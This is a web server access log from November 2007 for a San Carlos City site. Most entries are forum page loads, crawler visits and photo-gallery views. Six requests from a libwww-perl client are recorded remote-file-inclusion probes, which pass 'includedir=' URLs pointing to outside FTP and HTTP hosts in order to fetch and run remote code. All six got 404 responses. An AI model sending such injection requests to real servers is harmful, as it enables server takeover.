65.95.28.49 - - [01/Nov/2007:06:12:45 -0700] "GET /forum2/style_images/red_crysta/css_pp_header.gif HTTP/1.1" 200 2719 "http://www.sancarloscity.org/forum2/index.php?s=5d17ca4228776cd2c882f623566718f6&showtopic=149&st=0&p=834&#entry834" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.sancarloscity.org"
65.95.28.49 - - [01/Nov/2007:06:12:45 -0700] "GET /forum2/jscripts/ipb_topic.js HTTP/1.1" 200 14082 "http://www.sancarloscity.org/forum2/index.php?s=5d17ca4228776cd2c882f623566718f6&showtopic=149&st=0&p=834&#entry834" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.sancarloscity.org"
65.95.28.49 - - [01/Nov/2007:06:12:45 -0700] "GET /forum2/jscripts/ips_text_editor_lite.js HTTP/1.1" 200 9928 "http://www.sancarloscity.org/forum2/index.php?s=5d17ca4228776cd2c882f623566718f6&showtopic=149&st=0&p=834&#entry834" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.sancarloscity.org"
65.95.28.49 - - [01/Nov/2007:06:12:46 -0700] "GET /forum2/style_images/red_crysta/t_reply.gif HTTP/1.1" 200 1957 "http://www.sancarloscity.org/forum2/index.php?s=5d17ca4228776cd2c882f623566718f6&showtopic=149&st=0&p=834&#entry834" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.sancarloscity.org"
65.95.28.49 - - [01/Nov/2007:06:12:46 -0700] "GET /forum2/style_images/red_crysta/t_new.gif HTTP/1.1" 200 1947 "http://www.sancarloscity.org/forum2/index.php?s=5d17ca4228776cd2c882f623566718f6&showtopic=149&st=0&p=834&#entry834" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.sancarloscity.org"
65.95.28.49 - - [01/Nov/2007:06:12:46 -0700] "GET /forum2/style_images/red_crysta/iframe.html HTTP/1.1" 200 475 "http://www.sancarloscity.org/forum2/index.php?s=5d17ca4228776cd2c882f623566718f6&showtopic=149&st=0&p=834&#entry834" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.sancarloscity.org"
65.95.28.49 - - [01/Nov/2007:06:12:46 -0700] "GET /forum2/style_images/red_crysta/iframe.html HTTP/1.1" 200 475 "http://www.sancarloscity.org/forum2/index.php?s=5d17ca4228776cd2c882f623566718f6&showtopic=149&st=0&p=834&#entry834" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.sancarloscity.org"
65.95.28.49 - - [01/Nov/2007:06:12:46 -0700] "GET /forum2/style_images/red_crysta/tile_cat.gif HTTP/1.1" 200 2760 "http://www.sancarloscity.org/forum2/index.php?s=5d17ca4228776cd2c882f623566718f6&showtopic=149&st=0&p=834&#entry834" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.sancarloscity.org"
65.95.28.49 - - [01/Nov/2007:06:12:46 -0700] "GET /forum2/style_images/red_crysta/nav_m.gif HTTP/1.1" 200 53 "http://www.sancarloscity.org/forum2/index.php?s=5d17ca4228776cd2c882f623566718f6&showtopic=149&st=0&p=834&#entry834" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.sancarloscity.org"
65.95.28.49 - - [01/Nov/2007:06:12:46 -0700] "GET /forum2/style_images/red_crysta/menu_action_down.gif HTTP/1.1" 200 100 "http://www.sancarloscity.org/forum2/index.php?s=5d17ca4228776cd2c882f623566718f6&showtopic=149&st=0&p=834&#entry834" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.sancarloscity.org"
65.95.28.49 - - [01/Nov/2007:06:12:46 -0700] "GET /forum2/style_images/red_crysta/menu_item.gif HTTP/1.1" 200 87 "http://www.sancarloscity.org/forum2/index.php?s=5d17ca4228776cd2c882f623566718f6&showtopic=149&st=0&p=834&#entry834" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.sancarloscity.org"
65.95.28.49 - - [01/Nov/2007:06:12:46 -0700] "GET /forum2/style_images/red_crysta/folder_profile_portal/user-offline.png HTTP/1.1" 200 569 "http://www.sancarloscity.org/forum2/index.php?s=5d17ca4228776cd2c882f623566718f6&showtopic=149&st=0&p=834&#entry834" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.sancarloscity.org"
65.95.28.49 - - [01/Nov/2007:06:12:46 -0700] "GET /forum2/style_images/red_crysta/folder_profile_portal/pp-blank-thumb.png HTTP/1.1" 200 10903 "http://www.sancarloscity.org/forum2/index.php?s=5d17ca4228776cd2c882f623566718f6&showtopic=149&st=0&p=834&#entry834" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.sancarloscity.org"
65.95.28.49 - - [01/Nov/2007:06:12:47 -0700] "GET /forum2/style_images/red_crysta/rating_0_mini.gif HTTP/1.1" 200 256 "http://www.sancarloscity.org/forum2/index.php?s=5d17ca4228776cd2c882f623566718f6&showtopic=149&st=0&p=834&#entry834" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.sancarloscity.org"
65.95.28.49 - - [01/Nov/2007:06:12:47 -0700] "GET /forum2/style_images/red_crysta/folder_profile_portal/gender_male.png HTTP/1.1" 200 692 "http://www.sancarloscity.org/forum2/index.php?s=5d17ca4228776cd2c882f623566718f6&showtopic=149&st=0&p=834&#entry834" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.sancarloscity.org"
65.95.28.49 - - [01/Nov/2007:06:12:47 -0700] "GET /forum2/style_images/red_crysta/folder_profile_portal/find_posts.png HTTP/1.1" 200 677 "http://www.sancarloscity.org/forum2/index.php?s=5d17ca4228776cd2c882f623566718f6&showtopic=149&st=0&p=834&#entry834" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.sancarloscity.org"
65.95.28.49 - - [01/Nov/2007:06:12:47 -0700] "GET /forum2/style_images/red_crysta/to_post_off.gif HTTP/1.1" 200 64 "http://www.sancarloscity.org/forum2/index.php?s=5d17ca4228776cd2c882f623566718f6&showtopic=149&st=0&p=834&#entry834" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.sancarloscity.org"
65.95.28.49 - - [01/Nov/2007:06:12:47 -0700] "GET /forum2/uploads/av-14.jpg HTTP/1.1" 200 2777 "http://www.sancarloscity.org/forum2/index.php?s=5d17ca4228776cd2c882f623566718f6&showtopic=149&st=0&p=834&#entry834" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.sancarloscity.org"
65.95.28.49 - - [01/Nov/2007:06:12:47 -0700] "GET /forum2/style_images/red_crysta/pip.gif HTTP/1.1" 200 125 "http://www.sancarloscity.org/forum2/index.php?s=5d17ca4228776cd2c882f623566718f6&showtopic=149&st=0&p=834&#entry834" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.sancarloscity.org"
65.95.28.49 - - [01/Nov/2007:06:12:47 -0700] "GET /forum2/style_images/red_crysta/spacer.gif HTTP/1.1" 200 43 "http://www.sancarloscity.org/forum2/index.php?s=5d17ca4228776cd2c882f623566718f6&showtopic=149&st=0&p=834&#entry834" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.sancarloscity.org"
65.95.28.49 - - [01/Nov/2007:06:12:47 -0700] "GET /forum2/style_images/red_crysta/p_up.gif HTTP/1.1" 200 1402 "http://www.sancarloscity.org/forum2/index.php?s=5d17ca4228776cd2c882f623566718f6&showtopic=149&st=0&p=834&#entry834" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.sancarloscity.org"
65.95.28.49 - - [01/Nov/2007:06:12:47 -0700] "GET /forum2/style_images/red_crysta/p_mq_add.gif HTTP/1.1" 200 1633 "http://www.sancarloscity.org/forum2/index.php?s=5d17ca4228776cd2c882f623566718f6&showtopic=149&st=0&p=834&#entry834" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.sancarloscity.org"
65.95.28.49 - - [01/Nov/2007:06:12:48 -0700] "GET /forum2/style_images/red_crysta/folder_profile_portal/gender_mystery.png HTTP/1.1" 200 697 "http://www.sancarloscity.org/forum2/index.php?s=5d17ca4228776cd2c882f623566718f6&showtopic=149&st=0&p=834&#entry834" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.sancarloscity.org"
65.95.28.49 - - [01/Nov/2007:06:12:48 -0700] "GET /forum2/style_images/red_crysta/p_quote.gif HTTP/1.1" 200 1516 "http://www.sancarloscity.org/forum2/index.php?s=5d17ca4228776cd2c882f623566718f6&showtopic=149&st=0&p=834&#entry834" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.sancarloscity.org"
65.95.28.49 - - [01/Nov/2007:06:12:48 -0700] "GET /forum2/uploads/av-4.jpg HTTP/1.1" 200 1774 "http://www.sancarloscity.org/forum2/index.php?s=5d17ca4228776cd2c882f623566718f6&showtopic=149&st=0&p=834&#entry834" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.sancarloscity.org"
65.95.28.49 - - [01/Nov/2007:06:12:48 -0700] "GET /forum2/style_images/red_crysta/post_snapback.gif HTTP/1.1" 200 61 "http://www.sancarloscity.org/forum2/index.php?s=5d17ca4228776cd2c882f623566718f6&showtopic=149&st=0&p=834&#entry834" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.sancarloscity.org"
65.95.28.49 - - [01/Nov/2007:06:12:48 -0700] "GET /forum2/style_images/red_crysta/css_img_quote.gif HTTP/1.1" 200 406 "http://www.sancarloscity.org/forum2/index.php?s=5d17ca4228776cd2c882f623566718f6&showtopic=149&st=0&p=834&#entry834" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.sancarloscity.org"
65.95.28.49 - - [01/Nov/2007:06:12:48 -0700] "GET /forum2/style_images/red_crysta/rss.png HTTP/1.1" 200 1090 "http://www.sancarloscity.org/forum2/index.php?s=5d17ca4228776cd2c882f623566718f6&showtopic=149&st=0&p=834&#entry834" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.sancarloscity.org"
65.95.28.49 - - [01/Nov/2007:06:12:49 -0700] "GET /forum2/index.php?act=task HTTP/1.1" 200 59 "http://www.sancarloscity.org/forum2/index.php?s=5d17ca4228776cd2c882f623566718f6&showtopic=149&st=0&p=834&#entry834" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.sancarloscity.org"
66.35.110.26 - - [01/Nov/2007:06:14:15 -0700] "GET /jodera2/joderaphoto/%3Cwbr%20/%3Edisplayimage.php?...&pos=-387//tools/send_reminders.php?includedir=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 777 "-" "libwww-perl/5.808" "sancarloscity.org"
66.35.110.26 - - [01/Nov/2007:06:14:16 -0700] "GET /jodera2/joderaphoto/%3Cwbr%20/%3Edisplayimage.php?...&pos=-387//tools/send_reminders.php?includedir=http://smile.122mb.com/smile27.gif? HTTP/1.1" 404 777 "-" "libwww-perl/5.808" "sancarloscity.org"
66.35.110.26 - - [01/Nov/2007:06:14:16 -0700] "GET //tools/send_reminders.php?includedir=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 753 "-" "libwww-perl/5.808" "sancarloscity.org"
66.35.110.26 - - [01/Nov/2007:06:14:16 -0700] "GET //tools/send_reminders.php?includedir=http://smile.122mb.com/smile27.gif? HTTP/1.1" 404 753 "-" "libwww-perl/5.808" "sancarloscity.org"
66.35.110.26 - - [01/Nov/2007:06:14:16 -0700] "GET /jodera2/joderaphoto/%3Cwbr%20//tools/send_reminders.php?includedir=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 782 "-" "libwww-perl/5.808" "sancarloscity.org"
66.35.110.26 - - [01/Nov/2007:06:14:17 -0700] "GET /jodera2/joderaphoto/%3Cwbr%20//tools/send_reminders.php?includedir=http://smile.122mb.com/smile27.gif? HTTP/1.1" 404 782 "-" "libwww-perl/5.808" "sancarloscity.org"
74.6.27.19 - - [01/Nov/2007:06:14:28 -0700] "GET /picgallery/displayimage.php?album=random&cat=0&pos=-164 HTTP/1.0" 200 13819 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
74.6.23.218 - - [01/Nov/2007:06:14:37 -0700] "GET /picgallery/addfav.php?pid=352 HTTP/1.0" 302 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
74.6.23.218 - - [01/Nov/2007:06:14:39 -0700] "GET /picgallery/displayimage.php?pos=0 HTTP/1.0" 200 3991 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
74.6.23.216 - - [01/Nov/2007:06:18:24 -0700] "GET /forum2/index.php?act=findpost&hl=&pid=824 HTTP/1.0" 302 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
74.6.23.216 - - [01/Nov/2007:06:18:26 -0700] "GET /forum2/index.php?s=c23bf8c7ddb4c57e72e1a2f9d6718ea7&showtopic=145&st=0&p=824& HTTP/1.0" 200 6064 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
65.55.209.55 - - [01/Nov/2007:06:18:52 -0700] "GET /robots.txt HTTP/1.0" 404 730 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.sancarloscity.org"
65.55.209.55 - - [01/Nov/2007:06:18:54 -0700] "GET /forum2/index.php?s=1d4561e3826a87d05a0b6cad92cf4cad&showtopic=114&view=getlastpost HTTP/1.0" 302 0 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.sancarloscity.org"
74.6.29.37 - - [01/Nov/2007:06:19:11 -0700] "GET /picgallery/displayimage.php?album=39&pos=1 HTTP/1.0" 200 13090 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
65.55.209.55 - - [01/Nov/2007:06:20:06 -0700] "GET /forum2/index.php?s=6e9a09453f800a7cafb5ba45b550c662&showtopic=114&pid=871&st=20& HTTP/1.0" 200 90984 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.sancarloscity.org"
124.105.41.38 - - [01/Nov/2007:06:20:25 -0700] "GET /slowpoke/vecustombg.jpg HTTP/1.1" 200 33286 "http://profiles.friendster.com/52282788" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727)" "www.sancarloscity.org"
74.6.28.77 - - [01/Nov/2007:06:21:03 -0700] "GET /forum2/index.php?showtopic=87&mode=linear&view=findpost&p=261 HTTP/1.0" 302 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
74.6.28.77 - - [01/Nov/2007:06:21:04 -0700] "GET /forum2/index.php?s=61916c52fe25461ec4f72b32b814537d&showtopic=87&st=0&p=261& HTTP/1.0" 200 7339 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
74.6.23.15 - - [01/Nov/2007:06:22:20 -0700] "GET /forum2/index.php?showtopic=114&view=getlastpost HTTP/1.0" 302 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
74.6.23.15 - - [01/Nov/2007:06:22:22 -0700] "GET /forum2/index.php?s=8fda2165c425e702895687e3fb731dfc&showtopic=114&pid=871&st=20& HTTP/1.0" 200 10577 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
74.6.28.124 - - [01/Nov/2007:06:23:48 -0700] "GET /forum2/index.php?automodule=blog&blogid=3&showentry=44&show=nextnewest HTTP/1.0" 302 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
74.6.28.124 - - [01/Nov/2007:06:23:50 -0700] "GET /forum2/index.php?s=3b8b29e9e3c5f583e82e979e00ae1e8a&automodule=blog&blogid=3&showentry=45 HTTP/1.0" 200 5371 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
74.6.20.39 - - [01/Nov/2007:06:24:04 -0700] "GET /forum2/index.php?act=post&do=reply_post&f=5&t=51 HTTP/1.0" 200 2838 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
74.6.23.121 - - [01/Nov/2007:06:26:03 -0700] "GET /forum2/index.php?showtopic=149 HTTP/1.0" 200 6417 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
74.6.22.217 - - [01/Nov/2007:06:26:38 -0700] "GET /forum2/index.php?showtopic=153&mode=linear HTTP/1.0" 200 6210 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
82.99.30.31 - - [01/Nov/2007:06:26:42 -0700] "GET /gettingtosancarlos.htm HTTP/1.0" 200 21783 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "sancarloscity.org"
222.127.228.5 - - [01/Nov/2007:06:26:59 -0700] "GET /pintaflores/ HTTP/1.1" 200 22813 "http://search.yahoo.com/search;_ylt=A0oGkj2d0ylHlakAgWRXNyoA?p=pintaflores+theme+&y=Search&fr=yfp-t-501" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8" "www.sancarloscity.org"
222.127.228.5 - - [01/Nov/2007:06:27:01 -0700] "GET /scci01.jpg HTTP/1.1" 200 40666 "http://www.sancarloscity.org/pintaflores/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8" "www.sancarloscity.org"
222.127.228.5 - - [01/Nov/2007:06:27:03 -0700] "GET /pintaflores/pf.gif HTTP/1.1" 200 1954 "http://www.sancarloscity.org/pintaflores/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8" "www.sancarloscity.org"
222.127.228.5 - - [01/Nov/2007:06:27:05 -0700] "GET /pintaflores/Pintaflores1.jpg HTTP/1.1" 200 24049 "http://www.sancarloscity.org/pintaflores/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8" "www.sancarloscity.org"
222.127.228.5 - - [01/Nov/2007:06:27:08 -0700] "GET /pintaflores/Pintafl.jpg HTTP/1.1" 200 26163 "http://www.sancarloscity.org/pintaflores/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8" "www.sancarloscity.org"
222.127.228.5 - - [01/Nov/2007:06:27:08 -0700] "GET /pintaflores/pin1.jpg HTTP/1.1" 200 133819 "http://www.sancarloscity.org/pintaflores/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8" "www.sancarloscity.org"
222.127.228.5 - - [01/Nov/2007:06:27:11 -0700] "GET /pintaflores/Pintafl2.jpg HTTP/1.1" 200 37096 "http://www.sancarloscity.org/pintaflores/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8" "www.sancarloscity.org"
222.127.228.5 - - [01/Nov/2007:06:27:15 -0700] "GET /pintaflores/Pintafl3.jpg HTTP/1.1" 200 39488 "http://www.sancarloscity.org/pintaflores/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8" "www.sancarloscity.org"
222.127.228.5 - - [01/Nov/2007:06:27:16 -0700] "GET /pintaflores/PIC02002.JPG HTTP/1.1" 200 29898 "http://www.sancarloscity.org/pintaflores/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8" "www.sancarloscity.org"
222.127.228.5 - - [01/Nov/2007:06:27:18 -0700] "GET /pintaflores/PIC02003.JPG HTTP/1.1" 200 23645 "http://www.sancarloscity.org/pintaflores/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8" "www.sancarloscity.org"
222.127.228.5 - - [01/Nov/2007:06:27:19 -0700] "GET /pintaflores/PIC02004.JPG HTTP/1.1" 200 16351 "http://www.sancarloscity.org/pintaflores/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8" "www.sancarloscity.org"
222.127.228.5 - - [01/Nov/2007:06:27:21 -0700] "GET /pintaflores/PIC02005.JPG HTTP/1.1" 200 21001 "http://www.sancarloscity.org/pintaflores/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8" "www.sancarloscity.org"
222.127.228.5 - - [01/Nov/2007:06:27:22 -0700] "GET /pintaflores/PIC02006.JPG HTTP/1.1" 200 22141 "http://www.sancarloscity.org/pintaflores/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8" "www.sancarloscity.org"
222.127.228.5 - - [01/Nov/2007:06:27:25 -0700] "GET /favicon.ico HTTP/1.1" 404 747 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8" "www.sancarloscity.org"
74.6.27.114 - - [01/Nov/2007:06:28:08 -0700] "GET /forum2/index.php?act=Post&CODE=02&f=9&t=149&qpid=847 HTTP/1.0" 200 2843 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:28:18 -0700] "GET /forum2/index.php?act=Help HTTP/1.0" 200 11180 "-" "ia_archiver" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:28:23 -0700] "GET /forum2/index.php?act=Login&CODE=00 HTTP/1.0" 200 8669 "-" "ia_archiver" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:28:28 -0700] "GET /forum2/index.php?act=Login&CODE=01&CookieDate=1 HTTP/1.0" 200 7732 "-" "ia_archiver" "www.sancarloscity.org"
222.127.228.5 - - [01/Nov/2007:06:28:33 -0700] "GET / HTTP/1.1" 200 58676 "http://www.sancarloscity.org/.search?query=pintaflores+lyrics" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:28:33 -0700] "GET /forum2/index.php?act=Login&CODE=04&f=10&fromforum=0&i=1 HTTP/1.0" 302 0 "-" "ia_archiver" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:28:34 -0700] "GET /forum2/index.php?act=idx HTTP/1.0" 200 32651 "-" "ia_archiver" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:28:38 -0700] "GET /forum2/index.php?act=Login&CODE=04&f=11&fromforum=0&i=1 HTTP/1.0" 302 0 "-" "ia_archiver" "www.sancarloscity.org"
222.127.228.5 - - [01/Nov/2007:06:28:41 -0700] "GET /bg_glass_bottomleft3.jpg HTTP/1.1" 304 - "http://www.sancarloscity.org/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:28:43 -0700] "GET /forum2/index.php?act=Login&CODE=04&f=12&fromforum=0&i=1 HTTP/1.0" 302 0 "-" "ia_archiver" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:28:48 -0700] "GET /forum2/index.php?act=Login&CODE=04&f=13&fromforum=0&i=1 HTTP/1.0" 302 0 "-" "ia_archiver" "www.sancarloscity.org"
222.127.228.5 - - [01/Nov/2007:06:28:50 -0700] "GET /wheretostaytab2.jpg HTTP/1.1" 304 - "http://www.sancarloscity.org/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:28:53 -0700] "GET /forum2/index.php?act=Login&CODE=04&f=15&fromforum=0&i=1 HTTP/1.0" 302 0 "-" "ia_archiver" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:28:58 -0700] "GET /forum2/index.php?act=Login&CODE=04&f=16&fromforum=0&i=1 HTTP/1.0" 302 0 "-" "ia_archiver" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:29:03 -0700] "GET /forum2/index.php?act=Login&CODE=04&f=17&fromforum=0&i=1 HTTP/1.0" 302 0 "-" "ia_archiver" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:29:09 -0700] "GET /forum2/index.php?act=Login&CODE=04&f=4&fromforum=0&i=1 HTTP/1.0" 302 0 "-" "ia_archiver" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:29:14 -0700] "GET /forum2/index.php?act=Login&CODE=04&f=5&fromforum=0&i=1 HTTP/1.0" 302 0 "-" "ia_archiver" "www.sancarloscity.org"
222.127.228.5 - - [01/Nov/2007:06:29:19 -0700] "GET /forum2/index.php?showtopic=154 HTTP/1.1" 200 6300 "http://www.sancarloscity.org/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:29:19 -0700] "GET /forum2/index.php?act=Login&CODE=04&f=7&fromforum=0&i=1 HTTP/1.0" 302 0 "-" "ia_archiver" "www.sancarloscity.org"
222.127.228.5 - - [01/Nov/2007:06:29:20 -0700] "GET /forum2/favicon.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8" "www.sancarloscity.org"
222.127.228.5 - - [01/Nov/2007:06:29:21 -0700] "GET /forum2/style_images/css_2.css HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/index.php?showtopic=154" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:29:24 -0700] "GET /forum2/index.php?act=Login&CODE=04&f=9&fromforum=0&i=1 HTTP/1.0" 302 0 "-" "ia_archiver" "www.sancarloscity.org"
222.127.228.5 - - [01/Nov/2007:06:29:25 -0700] "GET /forum2/jscripts/ipb_global.js HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/index.php?showtopic=154" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8" "www.sancarloscity.org"
